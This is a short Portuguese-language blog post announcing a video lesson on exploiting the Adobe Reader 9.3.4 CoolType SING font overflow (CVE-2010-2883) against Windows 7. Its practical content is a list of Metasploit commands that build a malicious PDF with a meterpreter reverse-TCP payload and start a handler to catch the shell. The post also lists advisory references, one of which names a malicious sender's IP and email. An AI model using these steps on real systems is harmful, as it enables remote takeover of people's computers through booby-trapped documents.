Mais uma vulnerabilidade no Adobe reader (CVE-2010-2883), dessa vez do tipo 0day. Olhando os novos exploits apos uma atualização do metasploit, encontrei esse e resolvi fazer uma aula, a versão do adobe usada na aula foi a 9.3.4 ultima versão disponível e o sistema operacional alvo "Windows 7" mas funciona em versões anteriores.

Comandos:
use exploit/windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp
set lhost IP
exploit
use multi/handler
Sobre o Vídeo:
Formato: AVI
Tamanho: 18.8 MB
Duração: 5:59 min
Musica: Carl Orff - Carmina Burana - O Fortuna

Baixar:
On line:
Obs: Usei na aula a distro Ubuntu com Metasploit. A mesmo pode ser na distro do BT.

Ref:
CVE - CVE-2010-2883 (under review)
67849: Adobe Reader / Acrobat CoolType.dll SING (Smart INdependent Glyphlets) Font uniqueName Field Parsing Overflow
contagio: CVE-2010-2883 Adobe 0-Day David Leadbetter's One Point Lesson from 193.106.85.61 thomasbennett34@yahoo.com
Adobe - Security Advisories: APSA10-02 - Security Advisory for Adobe Reader and Acrobat

Fonte: Blog do Bhior: Vulnerabilidade no Adobe Reader 9.3.4(0day)